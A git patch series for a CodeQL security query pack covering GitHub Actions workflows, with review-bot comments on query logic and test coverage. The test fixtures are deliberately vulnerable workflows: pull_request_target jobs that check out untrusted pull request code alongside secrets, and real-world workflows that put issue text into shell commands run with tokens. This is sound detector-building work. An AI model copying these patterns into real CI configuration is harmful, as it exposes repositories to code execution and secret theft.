+++ b/ql/src/test/.github/workflows/actor_trusted_checkout.yml @@ -0,0 +1,26 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + if: ${{ github.actor == "admin" }} + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/src/test/.github/workflows/label_trusted_checkout.yml b/ql/src/test/.github/workflows/label_trusted_checkout.yml new file mode 100644 index 00000000000..56bb143cf36 --- /dev/null +++ b/ql/src/test/.github/workflows/label_trusted_checkout.yml @@ -0,0 +1,27 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/src/test/.github/workflows/untrusted_checkout.yml b/ql/src/test/.github/workflows/untrusted_checkout.yml new file mode 100644 index 00000000000..a37ceb8f9f6 --- /dev/null +++ b/ql/src/test/.github/workflows/untrusted_checkout.yml @@ -0,0 +1,25 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! 
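Review bot: In `actor_trusted_checkout.yml` the guard is written `if: ${{ github.actor == "admin" }}`, but GitHub Actions expressions accept only single-quoted string literals, so this file is not a valid workflow. The query matches the condition as text, so the fixture still exercises `ActorCheckStmt`, but a fixture that stands for the "trusted" pattern should be something GitHub would actually evaluate: `if: ${{ github.actor == 'admin' }}`. Keeping the fixtures valid also avoids teaching the regex to accept forms that never occur in working workflows.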
From 68f15f2b85c24f38b1290ed70b8ae8e98d415ab3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 22 Feb 2024 13:14:53 +0100 Subject: [PATCH 0071/1267] rename query id --- ql/src/Security/CWE-094/UntrustedCheckout.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 4187e045c9b..25d05f1b7c2 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -6,7 +6,7 @@ * @kind problem * @problem.severity warning * @precision low - * @id actions/pull-request-target + * @id actions/untrusted-checkout * @tags actions * security * external/cwe/cwe-094 From f513a19c243bbd4c0c82ce3d9714078fc3dfed0f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 23 Feb 2024 11:53:47 +0100 Subject: [PATCH 0072/1267] fix: restrict EnvCtxAccessExpr to Env decarlations on the same file --- ql/lib/codeql/actions/Ast.qll | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 339daf5365e..68469ef2467 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -500,15 +500,10 @@ class InputsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { - exists(ReusableWorkflowStmt w | - w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputsStmt().getInputExpr(fieldName) = result - ) + result.getLocation().getFile() = this.getLocation().getFile() and + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result) or - exists(CompositeActionStmt a | - a.getLocation().getFile() = this.getLocation().getFile() and - a.getInputsStmt().getInputExpr(fieldName) = result - ) + exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result) } } 
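Review bot: In the rewritten `InputsCtxAccessExpr.getRefExpr()` the same-file condition guards only the first disjunct, because `and` binds tighter than `or` in QL. `result.getLocation().getFile() = this.getLocation().getFile() and exists(ReusableWorkflowStmt w | ...)` is one branch, while `exists(CompositeActionStmt a | ...)` is a separate branch with no file restriction. The removed code had the file check inside both `exists`. The `@@ -523,6 +523,7 @@` hunk in `EnvCtxAccessExpr.getRefExpr()` has the same shape: the added line restricts only the `JobUsesExpr` branch and leaves the `StepUsesExpr` and `RunExpr` branches matching declarations in any file, which is the cross-file resolution the commit subject says it removes. Parenthesising the disjunction fixes both: keep the `... getFile() and` line and wrap what follows as `( exists(...) or exists(...) )`; both enclosing classes start outside the hunks.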
@@ -528,6 +523,7 @@ class EnvCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { + result.getLocation().getFile() = this.getLocation().getFile() and exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) or exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) From 645177cc8083e2d6f249ec1feaba5b8d9687ef9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 26 Feb 2024 09:39:42 +0100 Subject: [PATCH 0073/1267] Account for github.event.label check as a sanitizer for untrusted checkout --- ql/src/Security/CWE-094/UntrustedCheckout.ql | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 25d05f1b7c2..9c9b5f9eb26 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -25,7 +25,10 @@ class ActorCheckStmt extends IfStmt { * An If node that contains a `label` check */ class LabelCheckStmt extends IfStmt { - LabelCheckStmt() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") } + LabelCheckStmt() { + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or + this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") + } } from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep From 98f3a1e7bf03d725889d4b0cdd3a9a066380424b Mon Sep 17 00:00:00 2001 
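Review bot: `LabelCheckStmt` is treated as a sanitizer on the strength of the `if:` text alone; nothing in this hunk or in the query's `where` clause looks at the trigger's activity `types`. `github.event.pull_request.labels` reflects labels already present on the pull request, so unless the workflow is limited to `types: [labeled]` (as the `label_trusted_checkout.yml` fixture is), a run triggered by a later push passes the same condition with commits that were not reviewed when the label was applied, and the query stays silent. Consider requiring the `labeled`-only trigger before accepting the label check, or at least record the assumption in the class comment: `Assumes the workflow runs only on the 'labeled' activity type.` As a style point, the two `regexpMatch` calls can be one pattern with an alternation.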
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 26 Feb 2024 10:43:55 +0100 Subject: [PATCH 0074/1267] fix(env): Improve env access support --- ql/lib/codeql/actions/Ast.qll | 84 +++--------- ql/src/test/.github/workflows/cross1.yml | 160 +++++++++++++++++++++++ ql/src/test/.github/workflows/cross2.yml | 109 +++++++++++++++ ql/src/test/.github/workflows/cross3.yml | 67 ++++++++++ 4 files changed, 355 insertions(+), 65 deletions(-) create mode 100644 ql/src/test/.github/workflows/cross1.yml create mode 100644 ql/src/test/.github/workflows/cross2.yml create mode 100644 ql/src/test/.github/workflows/cross3.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 68469ef2467..fd66acf530d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -23,6 +23,21 @@ class AstNode instanceof YamlNode { class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + Expression getEnvExpr(string name) { + exists(Actions::Env env | + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + | + env.(Actions::StepEnv).getStep().getAChildNode*() = this + or + env.(Actions::JobEnv).getJob().getAChildNode*() = this + or + env.(Actions::WorkflowEnv).getWorkflow().getAChildNode*() = this + ) + } } /** @@ -212,8 +227,6 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); abstract Expression getArgumentExpr(string key); - - abstract Expression getEnvExpr(string name); } /** 
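Review bot: `Statement.getEnvExpr(name)` returns the step-, job- and workflow-level declarations of `name` together, so when a step redefines a variable that is also set on its job or workflow, an `env.NAME` access resolves to the shadowed outer value as well as the effective one. For the taint queries this can report a flow from a workflow-level value that the step has overridden; if that over-approximation is intended, the QLDoc should say so. The comment was carried over from the step-only predicates and no longer matches: `Gets a environment variable expression by name in the scope of the current step.` should read along the lines of `Gets an expression assigned to environment variable 'name' at step, job or workflow level, for each level that encloses this statement (inner declarations do not hide outer ones).` `Statement` starts outside the hunk.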
@@ -234,26 +247,6 @@ class StepUsesExpr extends StepStmt, UsesExpr { result = with.lookup(key) ) } - - /** - * Gets a environment variable expression by name in the scope of the current step. - */ - override Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -302,23 +295,6 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - override Expression getEnvExpr(string name) { - this.(YamlMapping).lookup("env").(YamlMapping).lookup(name) = result - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** 
@@ -332,26 +308,6 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -523,11 +479,9 @@ class EnvCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { - result.getLocation().getFile() = this.getLocation().getFile() and - exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) - or - exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) - or - exists(RunExpr s | s.getEnvExpr(fieldName) = result) + exists(Statement s | + s.getEnvExpr(fieldName) = result and + s.getAChildNode*() = this + ) } } diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/src/test/.github/workflows/cross1.yml new file mode 100644 index 00000000000..9927aca8c56 --- /dev/null +++ b/ql/src/test/.github/workflows/cross1.yml 
@@ -0,0 +1,160 @@ +# Issues_workflow.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/Issues_workflow.yaml#L128-L128) +name: Issue Workflow +on: + issues: + types: [opened,edited] +jobs: + #This job will check the issue to determine if it should be moved to a different repository + redirectIssue: + name: Check for issue transfer + runs-on: ubuntu-latest + env: + #The 'content_analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding any labels is necessary. + #The initial 'undefined' value will be overridden when the script runs. + content_analysis_response: undefined + ISSUE_TITLE: ${{github.event.issue.title}} + ISSUE_BODY: ${{github.event.issue.body}} + outputs: + result: ${{env.content_analysis_response}} + steps: + - uses: actions/checkout@v4 + + #Detect if the issue_title follows the regex expression + - name: Check Issue Title + uses: actions-ecosystem/action-regex-match@v2 + id: regex-match + with: + text: ${{github.event.issue.title}} + regex: '^[A-Za-z0-9 _.]*$' + flags: g + + #If the regex output is '' means that the issue title contains special chars + - name: Exit Job + if: ${{ steps.regex-match.outputs.match == '' }} + run: | + echo "Bad Issue Title Format" + exit 1 + + #Remove the " character in the issue title and replaced with - + - name: Remove conflicting chars + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: '-' + flags: g + + #According to the issue_title returns a specific label + - name: Check Information + id: check-info + env: + ISSUE_TITLE_PARSED: ${{steps.remove_quotations.outputs.replaced}} + run: | + echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV + + #labels the issue based in the text returned in content_analysis_response var + - name: Label issue + if: 
env.content_analysis_response != 'Valid' + #Uses DYNAMOBOTTOKEN to allow interaction between repos + run: | + curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels + + #This job will scan the issue content to determing if more information is needed and act acordingly + #Will only run if the "redirectIssue" job outputted a 'Valid' result + checkIssueInformation: + if: needs.redirectIssue.outputs.result == 'Valid' + name: Check for missing information + #Wait for the previous job to finish as it needs its output + needs: redirectIssue + runs-on: ubuntu-latest + env: + #The 'analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding the label and comment is necessary. + #The initial 'undefined' value will be overridden when the script runs. + analysis_response: undefined + #Greetings for valid issues + greetings_comment: "Thank you for submitting the issue to us. We are sorry to + see you get stuck with your workflow. While waiting for our team member to respond, + please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information." + #Comment intro + comment_intro: "Hello ${{ github.actor }}, thank you for submitting this issue! + We are super excited that you want to help us make Dynamo all that it can be." + #issue_coment holds the comment format, while the missing information will be provided by analysis_response + needs_more_info_comment: "However, we need some more information in order for the Dynamo + team to investigate any further.\\n\\n" + #comment to be used if the issue is closed due to the template being empty + close_issue_comment: "However, given that there has been no additional information added, + this issue will be closed for now. 
Please reopen and provide additional + information if you wish the Dynamo team to investigate further.\\n\\n" + #Info asked from the user in bot comments + info_needed: "Additional information:\\n + - Filling in of the provided Template (What did you do, What did you expect to see, + What did you see instead, What packages or external references (if any) were used)\\n + - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\\n + - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit + (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\\n + - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase + said errors message in the screenshot)\\n + - Reproducible steps on how to create the error in question." + #Text to ask for specific missing information (complemented by the analysis response) + specific_info: "Can you please fill in the following to the best of your ability:" + #template file name + template: "ISSUE_TEMPLATE.md" + #label to tag the issue with if its missing information + issue_label: needs more info + #amount of sections from the template that can be missing information for the issue to still be considered complete + acceptable_missing_info: 1 + steps: + #Checkout the repo + - uses: actions/checkout@v4 + + #Removes conflicting characters before using the issue content as a script parameter + - name: Remove conflicting chars + env: + ISSUE_BODY: ${{github.event.issue.body}} + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_BODY}} + replace-with: '-' + flags: g + + #Checks for missing information inside the issue content + - name: Check Information + id: check-info + env: + ISSUE_BODY: ${{ steps.remove_quotations.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh 
.\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV + + #Closes the issue if the analysis response is "Empty" + - name: Close issue + if: env.analysis_response == 'Empty' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} + + #Adds the "needs more info" label if needed + - name: Label and comment issue + if: ((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened')) + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + + #Removes the "needs more info" label if the issue has the missing information + - name: Unlabel updated issue + if: env.analysis_response == 'Valid' && github.event.action == 'edited' + run: | + echo urldecode ${{env.issue_label}} + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') + + #Adds greetings message + - name: Greetings + if: env.analysis_response == 'Valid' && github.event.action == 'opened' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments + + diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/src/test/.github/workflows/cross2.yml new file mode 100644 index 00000000000..ae24e21560b --- /dev/null +++ b/ql/src/test/.github/workflows/cross2.yml 
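Review bot: `cross1.yml`, `cross2.yml` and `cross3.yml` are added without anything that states what the queries are expected to report on them. The commit's diffstat lists only `Ast.qll` and these three workflows, so unless expectations are kept elsewhere, the cross-file `env` resolution this commit fixes is not pinned by an assertion. Both `cross1.yml` and `cross2.yml` declare `analysis_response`, which appears to be the case under test; a header comment would make that explicit, e.g. `# env.analysis_response must resolve only to the declaration in this file, not to the one in cross2.yml`.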
@@ -0,0 +1,109 @@ +# issue_type_predicter.yml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/issue_type_predicter.yml#L40-L40) +name: Issue Type Predicter +# This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue + +on: + issues: + types: [opened, edited] + +jobs: + issue_type_Predicter: + name: Issue Type Predicter + runs-on: ubuntu-latest + env: + # The 'analysis_response' variable is used to store the response returned by issue_analyzer.ps1 + # The initial 'undefined' value will be overridden when the script runs + analysis_response: undefined + # The 'parsed_issue_body' variable is used to store the parsed issue body (after removing some sections of the body like Stack Trace) + parsed_issue_body: undefined + # The 'issue_json_string' variable is used to store parsed info of the issue body as a json string + issue_json_string: undefined + # The 'is_wish_list' variable is used to store the value returned by the IssuesTypePredicter project + is_wish_list: undefined + # issue template file name + template: "ISSUE_TEMPLATE.md" + # amount of sections from the template that can be missing information for the issue to still be considered valid + acceptable_missing_info: 1 + + steps: + # Checkout Dynamo repo + - name: Checkout Dynamo Repo + uses: actions/checkout@v4 + + # Removes quotes before using the issue content as a script parameter + - name: Remove Quotes + id: remove_quotes + uses: frabert/replace-string-action@v2.5 + env: + ISSUE_BODY: ${{ github.event.issue.body }} + with: + pattern: "\"" + string: ${{ env.ISSUE_BODY }} + replace-with: '-' + + # Analyze for missing information inside the issue content + - name: Analyze Issue Body + env: + ISSUE_BODY: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV + 
+ # Remove sections in the issue body like "Dynamo version", "Stack Trace" because won't be used to predict the issue type + - name: Clean Issue Body + if: env.analysis_response == 'Valid' + env: + ISSUE_BODY_PARSED: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV + + # Create json string from the issue body + - name: Create Issue JSON String + if: env.analysis_response == 'Valid' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} + ISSUE_TITLE: ${{ github.event.issue.title }} + run: | + echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV + + # Checkout the IssuesTypePredicter repo (https://github.com/DynamoDS/IssuesTypePredicter) + - name: Checkout IssuesTypePredicter Repo + if: env.analysis_response == 'Valid' + uses: actions/checkout@v4 + with: + repository: DynamoDS/IssuesTypePredicter + path: IssuesTypePredicter + + # Setup dotnet + - name: Setup dotnet + uses: actions/setup-dotnet@v4 + with: + dotnet-version: '3.1.0' + + # Build the solution IssuesTypePredicter.sln (this contains two VS2019 ML.NET projects) + - name: Build Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + dotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release + cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . 
+ + # Execute the IssuesTypePredicter program and pass 'issue_json_string' as a parameter + - name: Run Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + echo "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV + + # If the is_wish_list variable contains 1, label the issue as "Wishlist" + - name: Label issue as 'Wishlist' + if: env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1') + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} + + # If the issue is missing important information (don't follow the template structure), label the issue as "NotMLEvaluated" + - name: Label issue as 'NotMLEvaluated' + if: env.analysis_response != 'Valid' || env.issue_json_string == '' + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/src/test/.github/workflows/cross3.yml new file mode 100644 index 00000000000..21ee9ca7f61 --- /dev/null +++ b/ql/src/test/.github/workflows/cross3.yml 
@@ -0,0 +1,67 @@
+# cherry-picking.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/disabled/cherry-picking.yaml#L45-L51)
+#DYN-3364
+#This action is disabled for now due to it not behaving as expected
+name: Cherry picking
+on:
+ push:
+ branches:
+ - master
+jobs:
+ cherry_pick:
+ runs-on: ubuntu-latest
+ env:
+ #Variable for the name of the branch to cherry-pick into.
+ #It will remain 'invalid' if no branch is specified
+ destination_branch: 'invalid'
+ #Name of the autogenerated branch to create the PR from
+ auto_branch: 'auto-${{github.event.after}}'
+ #Username for the cherrypick
+ user_name: "Dynamo-Bot"
+ steps:
+ - name: checkout
+ uses: actions/checkout@v3
+
+ #Removes posible conflicting characters on the commit message
+ #This is because the content of the message will be passed to a script as a parameter and quotation marks will split the text as if it where multiple parameters.
+ - name: Remove conflicting chars
+ uses: frabert/replace-string-action@v1.2
+ id: remove_quotations
+ with:
+ pattern: "\""
+ string: ${{github.event.commits[0].message}}
+ replace-with: "-"
+ flags: g
+
+ #Checks the message looking for a cherry-pick request and extracts the target branch name
+ - name: Check Information
+ env:
+ ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}}
+ id: check-info
+ run: |
+ echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV
+
+ #If a target branch was found will run the action
+ - if: env.destination_branch != 'invalid'
+ name: Create PR to branch
+ run: |
+ git config user.name "${{env.user_name}}"
+ git fetch --all
+ git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}}
+ git cherry-pick -x ${{github.event.after}} --strategy-option theirs
+ git push -u origin ${{env.auto_branch}}
+ hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}"
+ env:
+ #Token used for the pull request. Corresponds to the DynamoBot account
+ GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}}
+ ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}}
+ #This represents the title and description of the pr in Markdown format
+ #Everything before the first blank line will be the title
+ #Everything after will be included in the description
+ pr_message: |
+ Cherry-Pick from commit: ${{github.event.after}}
+
+ ### Cherry-picking:
+ [Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}})
+
+ ### Pull request:
+ ${{ env.ISSUE_BODY_PARSED }}
From fe976faf6ace6067fb39368a0bdedb92473a3e0e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 27 Feb 2024 15:20:35 +0100 Subject: [PATCH 0075/1267] feat(queries): Migrate queries from AdvancedSecurity repo --- ql/lib/codeql/actions/Ast.qll | 10 +++-- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ql/src/Security/CWE-094/UntrustedCheckout.md | 0 ql/src/Security/CWE-094/UntrustedCheckout.ql | 1 + .../CWE-275/MissingActionsPermissions.md | 22 ++++++++++ .../CWE-275/MissingActionsPermissions.ql | 23 ++++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.md | 44 +++++++++++++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 38 ++++++++++++++++ ql/src/test/.github/workflows/cross1.yml | 1 + ql/src/test/.github/workflows/cross2.yml | 1 + ql/src/test/.github/workflows/cross3.yml | 1 + 11 files changed, 139 insertions(+), 6 deletions(-) create mode 100644 ql/src/Security/CWE-094/UntrustedCheckout.md create mode 100644 ql/src/Security/CWE-275/MissingActionsPermissions.md create mode 100644 ql/src/Security/CWE-275/MissingActionsPermissions.ql create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.ql
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index fd66acf530d..2a506f2100c 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll @@ -54,8 +54,6 @@ class CompositeActionStmt extends Statement instanceof Actions::CompositeAction InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } - - string getName() { result = this.getLocation().getFile().getRelativePath() } } class RunsStmt extends Statement instanceof Actions::Runs { @@ -68,6 +66,8 @@ class RunsStmt extends Statement instanceof Actions::Runs { * A Github Actions Workflow */ class WorkflowStmt extends Statement instanceof Actions::Workflow { + string getName() { result = super.getName() } + JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } @@ -79,6 +79,8 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { string getATriggerEvent() { exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) } + + Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -91,8 +93,6 @@ class ReusableWorkflowStmt extends WorkflowStmt { InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } - - string getName() { result = this.getLocation().getFile().getRelativePath() } } class InputsStmt extends Statement instanceof YamlMapping { @@ -189,6 +189,8 @@ class JobStmt extends Statement instanceof Actions::Job { } IfStmt getIfStmt() { result = super.getIf() } + + Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index de88c39c2d5..43239e29485 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
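Review bot: Both new `getPermissionsStmt()` predicates (on `WorkflowStmt` and on `JobStmt`) declare the result type `Statement` but are defined as `this.(YamlMapping).lookup("permissions")`, so they only have a result when the looked-up YAML node is itself a `Statement`. The hunks do not show which node kinds `Statement` covers; if a scalar value such as `permissions: read-all` is not one of them, the MissingActionsPermissions query added in this commit would report a workflow that does declare permissions. A fixture with a scalar `permissions` value would settle it, and each predicate should carry a QLDoc line such as `/** Gets the value of the permissions key, if present. */`. The enclosing classes start and end outside the hunks.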
